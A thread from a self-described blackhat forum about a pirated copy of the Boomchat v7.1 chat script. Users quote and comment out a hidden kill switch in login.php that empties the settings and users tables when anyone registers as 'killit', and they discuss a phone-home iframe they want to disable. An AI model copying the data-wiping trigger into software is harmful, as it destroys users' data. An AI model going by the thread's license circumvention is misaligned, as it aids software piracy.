Best Blackhat Forum

Full Version: [GET] Boomchat v7.1 +Addons+Skins [Updated: December 14, 2015]
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7 8 9
Solving the problem can be solved by cleaning the database , it sticks this code
anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server
(12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
(12-14-2015 03:31 PM)ozghelp Wrote: [ -> ]
(12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"


thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(
(12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ]
(12-14-2015 03:31 PM)ozghelp Wrote: [ -> ]
(12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"


thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:
                            //if($username == 'killit'){
                                //$mysqli->query("TRUNCATE TABLE  setting");
                                //$mysqli->query("TRUNCATE TABLE  users");
                            //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.
great share bud thank's, max reps added
(12-15-2015 08:31 AM)sup3rman Wrote: [ -> ]
(12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ]
(12-14-2015 03:31 PM)ozghelp Wrote: [ -> ]
(12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"


thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:
                            //if($username == 'killit'){
                                //$mysqli->query("TRUNCATE TABLE  setting");
                                //$mysqli->query("TRUNCATE TABLE  users");
                            //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.
(12-16-2015 10:03 PM)oliver108 Wrote: [ -> ]
(12-15-2015 08:31 AM)sup3rman Wrote: [ -> ]
(12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ]
(12-14-2015 03:31 PM)ozghelp Wrote: [ -> ]
(12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this

This script is not free and illegal use of it is prohibited thanks to remove it from your server

Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"


thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:
                            //if($username == 'killit'){
                                //$mysqli->query("TRUNCATE TABLE  setting");
                                //$mysqli->query("TRUNCATE TABLE  users");
                            //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.

Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid
(12-17-2015 12:02 AM)sup3rman Wrote: [ -> ]
(12-16-2015 10:03 PM)oliver108 Wrote: [ -> ]
(12-15-2015 08:31 AM)sup3rman Wrote: [ -> ]
(12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ]
(12-14-2015 03:31 PM)ozghelp Wrote: [ -> ]


thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:
                            //if($username == 'killit'){
                                //$mysqli->query("TRUNCATE TABLE  setting");
                                //$mysqli->query("TRUNCATE TABLE  users");
                            //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.

Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid

I looked through the code sequence, but I still don't now 2 things: how the "inventor" knows, who is using his script - probably somewhere is a hidden line what send him the domain adress, i don't now -, and the 2nd, how he rewrite the main room-s data (topic, log, etc.)
(12-17-2015 12:42 AM)oliver108 Wrote: [ -> ]
(12-17-2015 12:02 AM)sup3rman Wrote: [ -> ]
(12-16-2015 10:03 PM)oliver108 Wrote: [ -> ]
(12-15-2015 08:31 AM)sup3rman Wrote: [ -> ]
(12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ]thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(

If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:

Code:
                            //if($username == 'killit'){
                                //$mysqli->query("TRUNCATE TABLE  setting");
                                //$mysqli->query("TRUNCATE TABLE  users");
                            //}

If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.

I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.

Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid

I looked through the code sequence, but I still don't now 2 things: how the "inventor" knows, who is using his script - probably somewhere is a hidden line what send him the domain adress, i don't now -, and the 2nd, how he rewrite the main room-s data (topic, log, etc.)

I think the homecall is in the iframe in admin_settings.php:
Code:
<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>

I dont remember but in v6.0 there was a comand for chaging the name of the main room, in v7 there is no such comand or I cant find it.
Pages: 1 2 3 4 5 6 7 8 9
Reference URL's